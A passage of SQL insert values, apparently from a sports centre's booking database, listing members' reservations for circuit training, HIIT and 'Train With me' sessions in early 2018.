(12066, 231, 'CTR', '2018-02-14', '18h00', '18h30', 'Circuit Training'),
(12065, 346, 'CTR', '2018-02-14', '18h00', '18h30', 'Circuit Training'),
(12063, 350, 'CTR', '2018-02-14', '18h00', '18h30', 'Circuit Training'),
(12064, 349, 'CTR', '2018-02-14', '18h00', '18h30', 'Circuit Training'),
(12062, 80, 'CTR', '2018-02-14', '18h00', '18h30', 'Circuit Training'),
(12061, 138, 'CTR', '2018-02-14', '17h15', '18h00', 'Circuit Training'),
(12060, 177, 'CTR', '2018-02-14', '17h15', '18h00', 'Circuit Training'),
(12059, 205, 'CTR', '2018-02-14', '17h15', '18h00', 'Circuit Training'),
(12058, 297, 'CTR', '2018-02-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12057, 265, 'CTR', '2018-02-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12056, 205, 'CTR', '2018-02-08', '18h45', '19h15', 'Circuit Training'),
(12055, 294, 'CTR', '2018-02-14', '20h30', '21h00', 'Circuit training'),
(12050, 294, 'CTR', '2018-02-12', '17h30', '18h00', 'Circuit Training'),
(12049, 255, 'CTR', '2018-02-19', '17h30', '18h00', 'Circuit Training'),
(12048, 177, 'CTR', '2018-02-07', '17h15', '18h00', 'Circuit Training'),
(12047, 90, 'CTR', '2018-02-07', '20h30', '21h00', 'Circuit training'),
(12046, 280, 'CTR', '2018-02-07', '20h30', '21h00', 'Circuit training'),
(12045, 132, 'CTR', '2018-02-07', '20h30', '21h00', 'Circuit training'),
(12044, 348, 'CTR', '2018-02-07', '18h45', '19h15', 'Circuit training'),
(12043, 348, 'CTR', '2018-02-07', '18h45', '19h15', 'Circuit training'),
(12042, 230, 'CTR', '2018-02-07', '18h45', '19h15', 'Circuit training'),
(12053, 294, 'CTR', '2018-02-07', '20h30', '21h00', 'Circuit training'),
(12040, 310, 'CTR', '2018-02-07', '18h45', '19h15', 'Circuit training'),
(12039, 247, 'CTR', '2018-02-07', '18h45', '19h15', 'Circuit training'),
(12038, 339, 'CTR', '2018-02-07', '18h45', '19h15', 'Circuit training'),
(12037, 231, 'CTR', '2018-02-07', '18h00', '18h30', 'Circuit Training'),
(12036, 346, 'CTR', '2018-02-07', '18h00', '18h30', 'Circuit Training'),
(12035, 331, 'CTR', '2018-02-07', '18h00', '18h30', 'Circuit Training'),
(12034, 296, 'CTR', '2018-02-07', '18h00', '18h30', 'Circuit Training'),
(12033, 350, 'CTR', '2018-02-07', '18h00', '18h30', 'Circuit Training'),
(12032, 349, 'CTR', '2018-02-07', '18h00', '18h30', 'Circuit Training'),
(12031, 92, 'CTR', '2018-02-07', '17h15', '18h00', 'Circuit Training'),
(12051, 138, 'CTR', '2018-02-07', '18h00', '18h30', 'Circuit Training'),
(12029, 205, 'CTR', '2018-02-07', '17h15', '18h00', 'Circuit Training'),
(12028, 329, 'CTR', '2018-02-07', '18h45', '19h15', 'Circuit training'),
(12027, 210, 'CTR', '2018-02-07', '18h45', '19h15', 'Circuit training'),
(12026, 344, 'CTR', '2018-02-14', '20h30', '21h00', 'Circuit training'),
(12025, 48, 'CTR', '2018-02-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12024, 48, 'CTR', '2018-02-07', '18h45', '19h15', 'Circuit training'),
(12023, 261, 'CTR', '2018-02-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12022, 180, 'CTR', '2018-02-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12021, 3, 'CTR', '2018-02-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12020, 80, 'CTR', '2018-02-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12019, 80, 'CTR', '2018-02-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12018, 324, 'CTR', '2018-02-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12017, 324, 'CTR', '2018-02-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12016, 350, 'CTR', '2018-02-05', '17h30', '18h00', 'Circuit Training'),
(12015, 349, 'CTR', '2018-02-05', '17h30', '18h00', 'Circuit Training'),
(12014, 205, 'CTR', '2018-02-05', '17h30', '18h00', 'Circuit Training'),
(12013, 323, 'CTR', '2018-02-07', '20h30', '21h00', 'Circuit training'),
(12012, 328, 'CTR', '2018-02-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12011, 328, 'CTR', '2018-02-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12010, 330, 'CTR', '2018-02-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12009, 330, 'CTR', '2018-02-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12008, 312, 'CTR', '2018-02-05', '17h30', '18h00', 'Circuit Training'),
(12006, 297, 'CTR', '2018-02-02', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12005, 265, 'CTR', '2018-02-02', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12004, 230, 'CTR', '2018-02-02', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12001, 195, 'CTR', '2018-02-05', '17h30', '18h00', 'Circuit Training'),
(12000, 48, 'CTR', '2018-02-02', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11999, 195, 'CTR', '2018-02-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11994, 297, 'CTR', '2018-02-05', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11998, 195, 'CTR', '2018-02-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11996, 281, 'CTR', '2018-02-05', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11997, 281, 'CTR', '2018-02-05', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11995, 297, 'CTR', '2018-02-05', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11993, 265, 'CTR', '2018-02-05', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11992, 265, 'CTR', '2018-02-05', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11991, 301, 'CTR', '2018-02-05', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11990, 301, 'CTR', '2018-02-05', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11989, 306, 'CTR', '2018-02-05', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11988, 306, 'CTR', '2018-02-05', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11987, 334, 'CTR', '2018-02-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11986, 334, 'CTR', '2018-02-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11985, 299, 'CTR', '2018-02-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11984, 299, 'CTR', '2018-02-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11983, 279, 'CTR', '2018-02-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11982, 279, 'CTR', '2018-02-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11981, 48, 'CTR', '2018-02-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11980, 48, 'CTR', '2018-02-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11979, 249, 'CTR', '2018-02-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11978, 249, 'CTR', '2018-02-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11977, 260, 'CTR', '2018-02-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11976, 260, 'CTR', '2018-02-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11926, 138, 'CTR', '2018-01-31', '17h15', '18h00', 'Circuit Training'),
(11959, 205, 'CTR', '2018-01-31', '17h15', '18h00', 'Circuit Training'),
(11928, 195, 'CTR', '2018-01-31', '18h00', '18h30', 'Circuit Training'),
(11929, 349, 'CTR', '2018-01-31', '18h00', '18h30', 'Circuit Training'),
(11930, 350, 'CTR', '2018-01-31', '18h00', '18h30', 'Circuit Training'),
(11931, 231, 'CTR', '2018-01-31', '18h00', '18h30', 'Circuit Training'),
(11960, 316, 'CTR', '2018-01-31', '17h15', '18h00', 'Circuit Training'),
(11933, 331, 'CTR', '2018-01-31', '18h00', '18h30', 'Circuit Training'),
(11934, 339, 'CTR', '2018-01-31', '18h45', '19h15', 'Circuit training'),
(11935, 173, 'CTR', '2018-01-31', '18h45', '19h15', 'Circuit training'),
(11936, 247, 'CTR', '2018-01-31', '18h45', '19h15', 'Circuit training'),
(11937, 310, 'CTR', '2018-01-31', '18h45', '19h15', 'Circuit training'),
(11938, 230, 'CTR', '2018-01-31', '18h45', '19h15', 'Circuit training'),
(11939, 348, 'CTR', '2018-01-31', '18h45', '19h15', 'Circuit training'),
(15011, 92, 'CTR', '2019-04-18', '20h30', '21h30', 'Circuit Training'),
(11941, 48, 'CTR', '2018-01-31', '18h45', '19h15', 'Circuit training'),
(12052, 80, 'CTR', '2018-02-07', '18h00', '18h30', 'Circuit Training'),
(11943, 132, 'CTR', '2018-01-31', '20h30', '21h00', 'Circuit training'),
(11944, 105, 'CTR', '2018-01-25', '18h45', '19h15', 'Circuit Training'),
(11945, 322, 'CTR', '2018-01-25', '18h45', '19h15', 'Circuit Training'),
(11974, 138, 'CTR', '2018-02-05', '17h30', '18h00', 'Circuit Training'),
(11975, 92, 'CTR', '2018-02-05', '17h30', '18h00', 'Circuit Training'),
(11972, 255, 'CTR', '2018-02-05', '17h30', '18h00', 'Circuit Training'),
(11973, 231, 'CTR', '2018-02-05', '17h30', '18h00', 'Circuit Training'),
(11971, 322, 'CTR', '2018-02-08', '18h45', '19h15', 'Circuit Training'),
(11970, 105, 'CTR', '2018-02-08', '18h45', '19h15', 'Circuit Training'),
(12003, 195, 'CTR', '2018-02-02', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11968, 224, 'CTR', '2018-02-01', '12h45', '13h15', 'Circuit Training'),
(11967, 345, 'CTR', '2018-02-01', '12h45', '13h15', 'Circuit Training'),
(11966, 189, 'CTR', '2018-02-01', '12h45', '13h15', 'Circuit Training'),
(11965, 205, 'CTR', '2018-02-01', '12h45', '13h15', 'Circuit Training'),
(11954, 312, 'CTR', '2018-01-29', '17h30', '18h00', 'Circuit Training'),
(11951, 249, 'CTR', '2018-01-26', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11949, 322, 'CTR', '2018-02-01', '18h45', '19h15', 'Circuit Training'),
(11950, 304, 'CTR', '2018-01-29', '17h30', '18h00', 'Circuit Training'),
(11947, 345, 'CTR', '2018-01-25', '12h45', '13h15', 'Circuit Training'),
(11948, 105, 'CTR', '2018-02-01', '18h45', '19h15', 'Circuit Training'),
(11946, 80, 'CTR', '2018-01-25', '18h45', '19h15', 'Circuit Training'),
(11925, 224, 'CTR', '2018-01-25', '12h45', '13h15', 'Circuit Training'),
(11924, 189, 'CTR', '2018-01-25', '12h45', '13h15', 'Circuit Training'),
(11923, 260, 'CTR', '2018-01-25', '12h45', '13h15', 'Circuit Training'),
(11921, 48, 'CTR', '2018-01-26', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11922, 338, 'CTR', '2018-01-24', '17h15', '18h00', 'Circuit Training'),
(11920, 269, 'CTR', '2018-01-26', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11919, 265, 'CTR', '2018-01-26', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11918, 297, 'CTR', '2018-01-26', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11807, 138, 'CTR', '2018-01-22', '17h30', '18h00', 'Circuit Training'),
(11808, 330, 'CTR', '2018-01-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11809, 330, 'CTR', '2018-01-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11917, 261, 'CTR', '2018-01-26', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11916, 180, 'CTR', '2018-01-26', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11915, 3, 'CTR', '2018-01-26', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11913, 138, 'CTR', '2018-01-24', '18h45', '19h15', 'Circuit training'),
(11912, 80, 'CTR', '2018-01-24', '18h00', '18h30', 'Circuit Training'),
(11911, 80, 'CTR', '2018-01-24', '18h00', '18h30', 'Circuit Training'),
(11909, 281, 'CTR', '2018-01-29', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11908, 281, 'CTR', '2018-01-29', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11958, 308, 'CTR', '2018-01-31', '20h30', '21h00', 'Circuit training'),
(11961, 90, 'CTR', '2018-01-31', '20h30', '21h00', 'Circuit training'),
(11962, 280, 'CTR', '2018-01-31', '20h30', '21h00', 'Circuit training'),
(11964, 294, 'CTR', '2018-02-09', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11903, 297, 'CTR', '2018-01-29', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11902, 297, 'CTR', '2018-01-29', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11901, 265, 'CTR', '2018-01-29', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11900, 265, 'CTR', '2018-01-29', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11956, 80, 'CTR', '2018-01-29', '17h30', '18h00', 'Circuit Training'),
(11955, 80, 'CTR', '2018-01-29', '17h30', '18h00', 'Circuit Training'),
(11952, 341, 'CTR', '2018-01-29', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11896, 341, 'CTR', '2018-01-29', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11895, 279, 'CTR', '2018-01-29', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11894, 279, 'CTR', '2018-01-29', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11893, 132, 'CTR', '2018-01-29', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11892, 132, 'CTR', '2018-01-29', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11891, 249, 'CTR', '2018-01-29', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11890, 249, 'CTR', '2018-01-29', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11889, 260, 'CTR', '2018-01-29', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11888, 260, 'CTR', '2018-01-29', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11957, 80, 'CTR', '2018-01-29', '17h30', '18h00', 'Circuit Training'),
(11886, 255, 'CTR', '2018-01-29', '17h30', '18h00', 'Circuit Training'),
(11885, 138, 'CTR', '2018-01-29', '17h30', '18h00', 'Circuit Training'),
(11953, 92, 'CTR', '2018-01-31', '17h15', '18h00', 'Circuit Training'),
(11883, 231, 'CTR', '2018-01-29', '17h30', '18h00', 'Circuit Training'),
(11882, 210, 'CTR', '2018-01-25', '18h45', '19h15', 'Circuit Training'),
(11881, 329, 'CTR', '2018-01-25', '18h45', '19h15', 'Circuit Training'),
(11880, 308, 'CTR', '2018-01-25', '18h45', '19h15', 'Circuit Training'),
(11878, 334, 'CTR', '2018-01-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11879, 334, 'CTR', '2018-01-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11875, 279, 'CTR', '2018-01-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11874, 279, 'CTR', '2018-01-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11873, 312, 'CTR', '2018-01-25', '12h45', '13h15', 'Circuit Training'),
(11872, 281, 'CTR', '2018-01-22', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11871, 281, 'CTR', '2018-01-22', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11870, 306, 'CTR', '2018-01-22', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11869, 306, 'CTR', '2018-01-22', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11868, 301, 'CTR', '2018-01-22', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11867, 301, 'CTR', '2018-01-22', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11866, 297, 'CTR', '2018-01-22', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11865, 297, 'CTR', '2018-01-22', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11864, 344, 'CTR', '2018-01-31', '20h30', '21h00', 'Circuit training'),
(11863, 265, 'CTR', '2018-01-22', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11860, 346, 'CTR', '2018-01-26', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(15013, 371, 'CTR', '2019-04-25', '18h30', '19h30', 'Circuit Training'),
(11858, 310, 'CTR', '2018-01-24', '18h45', '19h15', 'Circuit training'),
(11857, 247, 'CTR', '2018-01-24', '18h45', '19h15', 'Circuit training'),
(15044, 375, 'CTR', '0000-00-00', '18h30', '19h30', 'Circuit Training'),
(11855, 230, 'CTR', '2018-01-24', '18h45', '19h15', 'Circuit training'),
(11854, 339, 'CTR', '2018-01-24', '18h45', '19h15', 'Circuit training'),
(11853, 48, 'CTR', '2018-01-24', '18h45', '19h15', 'Circuit training'),
(11852, 173, 'CTR', '2018-01-24', '18h45', '19h15', 'Circuit training'),
(11851, 280, 'CTR', '2018-01-24', '18h45', '19h15', 'Circuit training'),
(11861, 92, 'CTR', '2018-01-24', '17h15', '18h00', 'Circuit Training'),
(11849, 195, 'CTR', '2018-01-24', '18h00', '18h30', 'Circuit Training'),
(11848, 311, 'CTR', '2018-01-24', '18h00', '18h30', 'Circuit Training'),
(11910, 80, 'CTR', '2018-01-24', '18h00', '18h30', 'Circuit Training'),
(11846, 296, 'CTR', '2018-01-24', '18h00', '18h30', 'Circuit Training'),
(11914, 195, 'CTR', '2018-01-26', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11844, 316, 'CTR', '2018-01-24', '17h15', '18h00', 'Circuit Training'),
(11843, 231, 'CTR', '2018-01-24', '17h15', '18h00', 'Circuit Training'),
(11842, 278, 'CTR', '2018-01-24', '18h00', '18h30', 'Circuit Training'),
(11841, 294, 'CTR', '2018-01-31', '20h30', '21h00', 'Circuit training'),
(11838, 48, 'CTR', '2018-01-29', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11837, 48, 'CTR', '2018-01-29', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11836, 224, 'CTR', '2018-01-18', '12h45', '13h15', 'Circuit Training'),
(11835, 260, 'CTR', '2018-01-18', '12h45', '13h15', 'Circuit Training'),
(11834, 341, 'CTR', '2018-01-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11833, 341, 'CTR', '2018-01-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11831, 324, 'CTR', '2018-01-18', '12h45', '13h15', 'Circuit Training'),
(11830, 338, 'CTR', '2018-01-19', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11829, 90, 'CTR', '2018-01-17', '20h30', '21h00', 'Circuit training'),
(11828, 90, 'CTR', '2018-01-17', '20h30', '21h00', 'Circuit training'),
(11826, 296, 'CTR', '2018-01-17', '18h00', '18h30', 'Circuit Training'),
(11827, 330, 'CTR', '2018-01-17', '18h00', '18h30', 'Circuit Training'),
(11825, 331, 'CTR', '2018-01-17', '18h00', '18h30', 'Circuit Training'),
(11824, 345, 'CTR', '2018-01-18', '12h45', '13h15', 'Circuit Training'),
(11823, 189, 'CTR', '2018-01-18', '12h45', '13h15', 'Circuit Training'),
(11822, 312, 'CTR', '2018-01-18', '12h45', '13h15', 'Circuit Training'),
(11820, 329, 'CTR', '2018-01-17', '20h30', '21h00', 'Circuit training'),
(11818, 210, 'CTR', '2018-01-17', '20h30', '21h00', 'Circuit training'),
(11840, 278, 'CTR', '2018-01-24', '18h00', '18h30', 'Circuit Training'),
(11839, 294, 'CTR', '2018-01-24', '17h15', '18h00', 'Circuit Training'),
(11815, 249, 'CTR', '2018-01-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11814, 249, 'CTR', '2018-01-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11813, 260, 'CTR', '2018-01-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11812, 260, 'CTR', '2018-01-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11811, 328, 'CTR', '2018-01-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11810, 328, 'CTR', '2018-01-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11806, 92, 'CTR', '2018-01-22', '17h30', '18h00', 'Circuit Training'),
(11801, 279, 'CTR', '2018-01-15', '17h30', '18h00', 'Circuit Training'),
(11796, 278, 'CTR', '2018-01-17', '17h15', '18h00', 'Circuit Training'),
(11795, 132, 'CTR', '2018-01-22', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11794, 132, 'CTR', '2018-01-22', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11793, 278, 'CTR', '2018-01-17', '17h15', '18h00', 'Circuit Training'),
(11792, 264, 'CTR', '2018-01-15', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11791, 264, 'CTR', '2018-01-15', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11789, 346, 'CTR', '2018-01-17', '18h00', '18h30', 'Circuit Training'),
(11788, 261, 'CTR', '2018-01-19', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11787, 230, 'CTR', '2018-01-19', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11786, 269, 'CTR', '2018-01-19', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11785, 48, 'CTR', '2018-01-19', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11784, 195, 'CTR', '2018-01-19', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11783, 294, 'CTR', '2018-01-19', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11782, 297, 'CTR', '2018-01-19', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11781, 265, 'CTR', '2018-01-19', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11780, 3, 'CTR', '2018-01-19', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11778, 165, 'CTR', '2018-01-17', '20h30', '21h00', 'Circuit training'),
(11777, 323, 'CTR', '2018-01-17', '20h30', '21h00', 'Circuit training'),
(11776, 230, 'CTR', '2018-01-17', '18h45', '19h15', 'Circuit training'),
(11775, 48, 'CTR', '2018-01-17', '18h45', '19h15', 'Circuit training'),
(11774, 80, 'CTR', '2018-01-17', '18h45', '19h15', 'Circuit training'),
(11773, 80, 'CTR', '2018-01-17', '18h45', '19h15', 'Circuit training'),
(11771, 173, 'CTR', '2018-01-17', '18h45', '19h15', 'Circuit training'),
(11772, 339, 'CTR', '2018-01-17', '18h45', '19h15', 'Circuit training'),
(11769, 247, 'CTR', '2018-01-17', '18h45', '19h15', 'Circuit training'),
(11770, 247, 'CTR', '2018-01-17', '18h45', '19h15', 'Circuit training'),
(11768, 316, 'CTR', '2018-01-17', '17h15', '18h00', 'Circuit Training'),
(11767, 138, 'CTR', '2018-01-17', '17h15', '18h00', 'Circuit Training'),
(11766, 313, 'CTR', '2018-01-17', '18h00', '18h30', 'Circuit Training'),
(11763, 140, 'CTR', '2018-01-17', '18h00', '18h30', 'Circuit Training'),
(11764, 343, 'CTR', '2018-01-17', '18h00', '18h30', 'Circuit Training'),
(11765, 314, 'CTR', '2018-01-17', '18h00', '18h30', 'Circuit Training'),
(11790, 138, 'CTR', '2018-01-15', '17h30', '18h00', 'Circuit Training'),
(11761, 231, 'CTR', '2018-01-17', '18h00', '18h30', 'Circuit Training'),
(11760, 195, 'CTR', '2018-01-17', '18h00', '18h30', 'Circuit Training'),
(11758, 3, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11759, 180, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11757, 261, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11756, 280, 'CTR', '2018-01-17', '17h15', '18h00', 'Circuit Training'),
(11754, 80, 'CTR', '2018-01-11', '12h45', '13h15', 'Circuit Training'),
(11753, 345, 'CTR', '2018-01-11', '12h45', '13h15', 'Circuit Training'),
(11752, 189, 'CTR', '2018-01-11', '12h45', '13h15', 'Circuit Training'),
(11751, 326, 'CTR', '2018-01-11', '18h45', '19h15', 'Circuit Training'),
(11750, 322, 'CTR', '2018-01-11', '18h45', '19h15', 'Circuit Training'),
(11749, 205, 'CTR', '2018-01-11', '12h45', '13h15', 'Circuit Training'),
(11748, 294, 'CTR', '2018-01-17', '20h30', '21h00', 'Circuit training'),
(11747, 294, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11744, 231, 'CTR', '2018-01-10', '18h00', '18h30', 'Circuit Training'),
(11743, 255, 'CTR', '2018-01-15', '17h30', '18h00', 'Circuit Training'),
(11740, 48, 'CTR', '2018-01-15', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11739, 48, 'CTR', '2018-01-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11738, 249, 'CTR', '2018-01-15', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11737, 249, 'CTR', '2018-01-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11736, 260, 'CTR', '2018-01-15', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11735, 260, 'CTR', '2018-01-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11797, 330, 'CTR', '2018-01-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11798, 330, 'CTR', '2018-01-15', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11732, 306, 'CTR', '2018-01-15', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11731, 306, 'CTR', '2018-01-15', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11730, 301, 'CTR', '2018-01-15', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11729, 301, 'CTR', '2018-01-15', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11862, 265, 'CTR', '2018-01-22', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11803, 231, 'CTR', '2018-01-22', '17h30', '18h00', 'Circuit Training'),
(11804, 255, 'CTR', '2018-01-22', '17h30', '18h00', 'Circuit Training'),
(11726, 297, 'CTR', '2018-01-15', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11725, 297, 'CTR', '2018-01-15', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11724, 265, 'CTR', '2018-01-15', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(11723, 265, 'CTR', '2018-01-15', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(11799, 328, 'CTR', '2018-01-15', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(11800, 328, 'CTR', '2018-01-15', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11720, 80, 'CTR', '2018-01-10', '18h00', '18h30', 'Circuit Training'),
(11719, 140, 'CTR', '2018-01-10', '18h00', '18h30', 'Circuit Training'),
(11718, 48, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11746, 278, 'CTR', '2018-01-10', '18h00', '18h30', 'Circuit Training'),
(11716, 343, 'CTR', '2018-01-10', '18h00', '18h30', 'Circuit Training'),
(11715, 308, 'CTR', '2018-01-11', '18h45', '19h15', 'Circuit Training'),
(11714, 329, 'CTR', '2018-01-11', '18h45', '19h15', 'Circuit Training'),
(11713, 210, 'CTR', '2018-01-11', '18h45', '19h15', 'Circuit Training'),
(11712, 344, 'CTR', '2018-01-17', '20h30', '21h00', 'Circuit training'),
(11711, 205, 'CTR', '2018-01-10', '18h45', '19h15', 'Circuit training'),
(11710, 338, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11709, 80, 'CTR', '2018-01-10', '18h45', '19h15', 'Circuit training'),
(11708, 80, 'CTR', '2018-01-10', '18h45', '19h15', 'Circuit training'),
(11707, 165, 'CTR', '2018-01-10', '20h30', '21h00', 'Circuit training'),
(11706, 323, 'CTR', '2018-01-10', '20h30', '21h00', 'Circuit training'),
(11705, 318, 'CTR', '2018-01-10', '18h45', '19h15', 'Circuit training'),
(11704, 173, 'CTR', '2018-01-10', '18h45', '19h15', 'Circuit training'),
(11703, 339, 'CTR', '2018-01-10', '18h45', '19h15', 'Circuit training'),
(11702, 310, 'CTR', '2018-01-10', '18h45', '19h15', 'Circuit training'),
(11700, 195, 'CTR', '2018-01-10', '18h00', '18h30', 'Circuit Training'),
(11699, 264, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11698, 297, 'CTR', '2018-01-12', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
